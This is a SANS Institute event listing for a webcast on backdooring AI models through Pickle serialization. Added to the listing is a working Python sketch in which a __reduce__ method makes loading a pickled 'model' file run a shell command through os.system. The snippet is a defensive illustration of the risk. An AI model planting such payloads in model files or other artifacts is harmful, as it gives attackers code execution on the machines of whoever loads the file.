Backdooring AI Models
During this webcast we will examine how AI models can be backdoored using vulnerabilities in serialization formats like Pickle. We will highlight the risks of untrusted models, demonstrate real-world techniques, and discuss strategies to secure AI pipelines against such attacks.
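The listing does not include code, but a minimal sketch of the Pickle risk it references might look like the following. The filename and shell command are hypothetical, chosen only to illustrate how loading an untrusted pickled "model" can execute attacker-controlled code via __reduce__.

    import pickle
    import os


    class MaliciousPayload:
        """Illustrative object whose unpickling triggers code execution."""

        def __reduce__(self):
            # __reduce__ tells pickle how to rebuild the object on load;
            # returning (os.system, (command,)) means that simply loading
            # the file runs an attacker-chosen shell command.
            return (os.system, ("echo 'code executed during model load'",))


    # An attacker embeds the payload in a file posing as a serialized model.
    with open("model.pkl", "wb") as f:
        pickle.dump(MaliciousPayload(), f)

    # A victim who naively loads the "model" executes the payload.
    with open("model.pkl", "rb") as f:
        pickle.load(f)

This is why untrusted model files should be loaded with safer formats or restricted loaders rather than raw pickle.load.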
This webcast supports content and knowledge from SEC545: GenAI and LLM Application Security™. To learn more about this course, explore upcoming sessions, and access your FREE demo, click here.
Speaker and Presenter Information
Relevant Government Agencies
Other Federal Agencies, Federal Government, State & Local Government
Event Type
Webcast
When
Thu, Mar 20, 2025, 12:00pm ET
Cost
Complimentary: $0.00
Website
Click here to visit event website
Organizer
SANS Institute